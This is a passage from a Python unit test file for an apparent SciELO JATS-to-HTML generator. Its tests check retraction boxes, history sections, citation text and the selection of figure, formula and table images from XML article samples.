</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01-EN.jpg"/>
</fig>
</p>
</abstract>
</front-stub>
</sub-article>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<img style="max-width:100%" src="2175-8239-jbn-2018-0058-vf01-EN.jpg">', html_string)
def test_if_history_section_is_present_in_primary_language(self):
sample = os.path.join(SAMPLES_PATH, '0034-7094-rba-69-03-0227.xml')
et = etree.parse(sample)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<h1 class="articleSectionTitle">History</h1>', html_string)
self.assertIn('<strong>Received</strong><br>9 July 2018</li>', html_string)
self.assertIn('<strong>Accepted</strong><br>14 Jan 2019</li>', html_string)
self.assertIn('<strong>Published</strong><br>26 Apr 2019</li>', html_string)
def test_if_history_section_is_present_in_sub_article(self):
sample = os.path.join(SAMPLES_PATH, '0034-7094-rba-69-03-0227.xml')
et = etree.parse(sample)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<h1 class="articleSectionTitle">Histórico</h1>', html_string)
self.assertIn('<strong>Recebido</strong><br>9 Jul 2018</li>', html_string)
self.assertIn('<strong>Aceito</strong><br>14 Jan 2019</li>', html_string)
self.assertIn('<strong>Publicado</strong><br>31 Maio 2019</li>', html_string)
def test_show_retraction_box_if_article_is_an_retraction(self):
sample = u"""<article article-type="retraction" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
<related-article ext-link-type="doi" id="r01" related-article-type="retracted-article"
xlink:href="10.1590/2236-8906-34/2018"/>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn(u'Esta retratação retrata o documento', html_string)
self.assertIn(
u'<ul><li><a href="https://doi.org/10.1590/2236-8906-34/2018" target="_blank">10.1590/2236-8906-34/2018</a></li>',
html_string
)
def test_should_translate_retraction_to_english(self):
sample = u"""<article article-type="retraction" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="en"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
<related-article ext-link-type="doi" id="r01" related-article-type="retracted-article"
xlink:href="10.1590/2236-8906-34/2018"/>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn(u'This retraction retracts the following document', html_string)
def test_do_not_show_retraction_box_if_article_is_not_a_retraction(self):
sample = u"""<article article-type="research-article" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
<related-article ext-link-type="doi" id="r01" related-article-type="retracted-article"
xlink:href="10.1590/2236-8906-34/2018"/>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertNotIn(u'This retraction retracts the following document', html_string)
def test_show_retraction_box_if_article_is_an_partial_retraction(self):
sample = u"""<article article-type="partial-retraction" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
<related-article ext-link-type="doi" id="r01" related-article-type="partial-retraction"
xlink:href="10.1590/2236-8906-34/2018"/>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn(u'Esta retratação retrata o documento', html_string)
self.assertIn(
u'<ul><li><a href="https://doi.org/10.1590/2236-8906-34/2018" target="_blank">10.1590/2236-8906-34/2018</a></li>',
html_string
)
def test_presents_link_to_retreted_document_using_pid(self):
sample = u"""<article article-type="partial-retraction" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
<related-article ext-link-type="scielo-pid" id="r01" related-article-type="partial-retraction"
xlink:href="S0864-34662016000200003"/>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn(u'Esta retratação retrata o documento', html_string)
self.assertIn(
u'<ul><li><a href="/article/S0864-34662016000200003" target="_blank">S0864-34662016000200003</a></li>',
html_string
)
def test_presents_link_to_retreted_document_using_aid(self):
sample = u"""<article article-type="partial-retraction" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
<related-article ext-link-type="scielo-aid" id="r01" related-article-type="partial-retraction"
xlink:href="12345567799"/>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn(u'Esta retratação retrata o documento', html_string)
self.assertIn(
u'<ul><li><a href="/article/12345567799" target="_blank">12345567799</a></li>',
html_string
)
def test_presents_in_how_to_cite_collab_and_et_al_if_contrib_quantity_is_greater_than_3(self):
sample = u"""<article article-type="partial-retraction" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2175-7860201869402</article-id>
<article-categories>
<subj-group subj-group-type="heading">
<subject>GSPC - Global Strategy for Plant Conservation</subject>
</subj-group>
</article-categories>
<title-group>
<article-title>Brazilian Flora 2020: Innovation and collaboration to meet Target 1 of the Global Strategy for Plant Conservation (GSPC)</article-title>
</title-group>
<contrib-group>
<contrib contrib-type="author">
<collab>The Brazil Flora Group</collab>
<xref ref-type="aff" rid="aff1"/>
</contrib>
<contrib contrib-type="author">
<name>
<surname>Filardi</surname>
<given-names>Fabiana L. Ranzato</given-names>
</name>
<xref ref-type="aff" rid="aff1"/>
<xref ref-type="corresp" rid="c1">1</xref>
</contrib>
<contrib contrib-type="author">
<name>
<surname>Barros</surname>
<given-names>Fábio de</given-names>
</name>
<xref ref-type="aff" rid="aff1"/>
</contrib>
<contrib contrib-type="author">
<name>
<surname>Bicudo</surname>
<given-names>Carlos E.M.</given-names>
</name>
<xref ref-type="aff" rid="aff1"/>
</contrib>
<contrib contrib-type="author">
<name>
<surname>Cavalcanti</surname>
<given-names>Taciana B.</given-names>
</name>
<xref ref-type="aff" rid="aff1"/>
</contrib>
</contrib-group>
<author-notes>
<corresp id="c1">
<label>1</label>Author for correspondence: <email>rafaela@jbrj.gov.br</email>, <email>floradobrasil2020@jbrj.gov.br</email>
</corresp>
<fn fn-type="edited-by">
<p>Editor de área: Dr. Renato Pereira</p>
</fn>
</author-notes>
<pub-date pub-type="epub-ppub">
<season>Oct-Dec</season>
<year>2018</year>
</pub-date>
<volume>69</volume>
<issue>04</issue>
<fpage>1513</fpage>
<lpage>1527</lpage>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn(
u'The Brazil Flora Group et al',
html_string
)
def test_article_meta_doi_should_be_an_explicit_link(self):
sample = u"""<article article-type="research-article" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="en"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/r</article-id>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode("utf-8"))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate("en")
html_string = etree.tostring(html, encoding="unicode", method="html")
article_header_dois = html.xpath("//span[contains(@class, 'group-doi')]//a[contains(@class, '_doi')]")
self.assertEquals(len(article_header_dois), 1)
class HTMLGeneratorDispFormulaTests(unittest.TestCase):
def setUp(self):
self.sample = u"""<article article-type="research-article" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2175-7860201869402</article-id>
<title-group>
<article-title>
Article Title
</article-title>
</title-group>
<pub-date pub-type="epub-ppub">
<season>Oct-Dec</season>
<year>2018</year>
</pub-date>
<supplementary-material mimetype="application"
mime-subtype="tiff"
xlink:href="1234-5678-rctb-45-05-0110-suppl02.tif"/>
</article-meta>
</front>
<body>
<sec>
<p>The Eh measurements... <xref ref-type="disp-formula" rid="e01">equation 1</xref>(in mV):</p>
{graphic1}
<p>We also used an... {graphic2}.</p>
</sec>
</body>
</article>"""
def test_graphic_images_alternatives_must_prioritize_scielo_web_in_disp_formula(self):
graphic1 = """
<disp-formula id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</disp-formula>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff" /><inline-graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
self.assertIsNotNone(
html.find(
'//div[@class="formula-container"]//img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
)
self.assertIsNotNone(
html.find('//p//img[@src="1234-5678-rctb-45-05-0110-e02.png"]')
)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_disp_formula(self):
graphic1 = """
<disp-formula id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</disp-formula>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
self.assertIsNotNone(
html.find(
'//div[@class="formula-container"]//img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
)
)
self.assertIsNotNone(
html.find('//p//img[@src="1234-5678-rctb-45-05-0110-e02.jpg"]')
)
def test_graphic_images_alternatives_must_prioritize_scielo_web_and_content_type_in_fig_when_thumb(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff" /><inline-graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.thumbnail.jpg);"]'
)
self.assertTrue(len(thumb_tag) > 0
)
def test_graphic_images_alternatives_must_prioritize_scielo_web_attribute_in_modal(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e03.png" specific-use="scielo-web" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e03.png"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_images_alternatives_must_get_first_graphic_in_modal_when_not_scielo_web_and_not_content_type_atribute(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png"/>
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_fig(self):
graphic1 = """
<fig id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.jpg);"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_disp_formula(self):
graphic1 = """
<disp-formula id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</disp-formula>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_disp_formula(self):
graphic1 = """
<disp-formula id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</disp-formula>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_fig(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_fig(self):
graphic1 = """
<fig id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_table_wrap(self):
graphic1 = """
<table-wrap id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</table-wrap>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_table_wrap(self):
graphic1 = """
<table-wrap id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</table-wrap>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
)
self.assertIsNotNone(modal_body)
class HTMLGeneratorFigTests(unittest.TestCase):
def setUp(self):
self.sample = u"""<article article-type="research-article" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2175-7860201869402</article-id>
<title-group>
<article-title>
Article Title
</article-title>
</title-group>
<pub-date pub-type="epub-ppub">
<season>Oct-Dec</season>
<year>2018</year>
</pub-date>
<supplementary-material mimetype="application"
mime-subtype="tiff"
xlink:href="1234-5678-rctb-45-05-0110-suppl02.tif"/>
</article-meta>
</front>
<body>
<sec>
<p>The Eh measurements... <xref ref-type="disp-formula" rid="e01">equation 1</xref>(in mV):</p>
{graphic1}
<p>We also used an... {graphic2}.</p>
</sec>
</body>
</article>"""
def test_graphic_images_alternatives_must_prioritize_scielo_web_and_content_type_in_fig_when_thumb(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff" /><inline-graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.thumbnail.jpg);"]'
)
self.assertTrue(len(thumb_tag) > 0
)
def test_graphic_images_alternatives_must_prioritize_scielo_web_attribute_in_modal(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e03.png" specific-use="scielo-web" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e03.png"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_images_alternatives_must_get_first_graphic_in_modal_when_not_scielo_web_and_not_content_type_atribute(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png"/>
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_fig(self):
graphic1 = """
<fig id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.jpg);"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_fig(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_fig(self):
graphic1 = """
<fig id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
)
self.assertIsNotNone(modal_body)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_xlink_href_not_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href=""/>
<graphic xlink:href="https://minio.scielo.br/documentstore/1678-992X/Wfy9dhFgfVFZgBbxg4WGVQM/a.jpg"/>
<graphic xlink:href="https://minio.scielo.br/documentstore/1678-992X/Wfy9dhFgfVFZgBbxg4WGVQM/b.jpg"/>
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'https://minio.scielo.br/documentstore/1678-992X/'
'Wfy9dhFgfVFZgBbxg4WGVQM/a.jpg'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_scielo_web_and_no_content_type_because_xlink_href_is_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'1234-5678-rctb-45-05-0110-e01.png'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
<graphic specific-use="scielo-web" xlink:href="" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'1234-5678-rctb-45-05-0110-e01.jpg'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_absent(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
<graphic specific-use="scielo-web" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'1234-5678-rctb-45-05-0110-e01.jpg'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
